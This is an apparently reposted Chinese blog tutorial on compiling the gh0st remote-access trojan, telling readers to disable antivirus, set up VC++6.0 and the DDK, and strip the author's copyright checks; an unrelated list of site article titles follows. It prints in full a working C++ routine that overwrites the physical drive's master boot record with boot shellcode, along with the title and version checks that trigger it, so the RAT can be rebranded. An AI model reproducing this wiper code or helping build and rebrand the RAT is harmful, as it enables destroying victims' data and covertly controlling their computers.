红狼的ghost远控代码+编译方法
来源:互联网 发布:matlab 纹理合成算法 编辑:程序博客网 时间:2024/06/03 02:13
红狼的gh0st远控是国内为数不多的优秀远控软件之一!
占资源少,稳定,操作方便!实在是居家旅行,杀人放火……
走题了,下面看正文吧
首先是gh0st的编译流程
1.架设编译环境vc++6.0 + ddk2003(编译驱动)
2.修改代码去除硬盘锁
3.编译
来讲第一步
关掉杀毒软件(否则杀毒软件会报毒,这个不用大惊小怪,黑客软件嘛!)
vc++6.0软件的下载安装就不必说了 大家迅雷搜一下就有了
注要完全编译需要更新sdk(65M左右),下载了sdk解压后直接覆盖到vc++6.0的安装目录就是了
至于sdk更新包 大家可以到黑客学院下载
第二步的话
在代码修改之前要说明的是
作者为了保护版权而设如果我们直接更改版权会造成硬盘被锁
所以我们要把硬盘锁的代码去掉
这一点十分重要,不然你的硬盘的资料就玩完了哦
/////////////////////////////////////////////////////////////////////////////
// CGh0stApp message handlers
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int CGh0stApp::KillMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};
// 重新构造MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
hDevice = CreateFile
(
"[url=]\\\\.\\PHYSICALDRIVE0[/url]",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
// 写入病毒内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
ExitProcess(-1);
return 0;
}
把上面的代码直接删除或者注释掉即可 位于 gh0st.cpp
// char strVer[10];
char strTitle[10];
strVer[0] = 'C';
strVer[1] = '.';
strVer[2] = 'R';
strVer[3] = 'u';
strVer[4] = 'f';
strVer[5] = 'u';
strVer[6] = 's';
strVer[7] = ' ';
strVer[8] = 'S';
strVer[9] = '\0';
strTitle[0] = 'G';
strTitle[1] = 'h';
strTitle[2] = '0';
strTitle[3] = 's';
strTitle[4] = 't';
strTitle[5] = ' ';
strTitle[6] = 'R';
strTitle[7] = 'A';
strTitle[8] = 'T';
strTitle[9] = '\0';
CString str;
GetDlgItemText(IDC_STATIC_VER, str);
if (str.Find(strVer) == -1)
((CGh0stApp *)AfxGetApp())->KillMBR();
GetParent()->GetWindowText(str);
if (str.Find(strTitle) == -1)
((CGh0stApp *)AfxGetApp())->KillMBR();
同样注释或者删除 BuildView.cpp
接下来你要改什么版权就怎么改吧 注:如果没有对硬盘锁代码没有做任何改动就改版权所造成后果可不要找我哦
第三步,编译
这个就不细说了,这个都不会就不要玩代码了
- 红狼的ghost远控代码+编译方法
- GHOST代码
- 光盘启动Ghost的系统备份恢复方法
- GHOST文件修改OEM的方法
- 解决联想电脑不能ghost的方法
- GHOST系统下安装IIS的方法
- 超简单的Ghost安装双系统方法
- GHOST 误操作的恢复方法
- 手动ghost备份系统的方法
- 红雨的容错代码(转)
- 漂亮的红果儿校内网代码
- 减少C++代码编译时间的方法
- 减少C++代码编译时间的方法
- 减少C++代码编译时间的方法
- 减少C++代码编译时间的方法
- 减少C++代码编译时间的方法
- 减少C++代码编译时间的方法
- linux编译执行c++代码的方法
- 页面右下角弹出类似QQ或MSN的消息提示
- 批处理中等待命令
- 我写测试用例时的坏习惯
- VC 编译连接(#if #ifdef #ifndef #else #endif defened)
- 一台电脑开多个TOMCAT
- 红狼的ghost远控代码+编译方法
- Linux内核之旅
- 浅议Qt的事件处理机制 二
- SqlServer2005数据库自动备份
- 浅议Qt的事件处理机制 一
- 一个程序员的成长的六个阶段
- 带你走进缓存世界(4):缓存之缓
- 说说INSTANCE_GROUPS --白鳝
- dom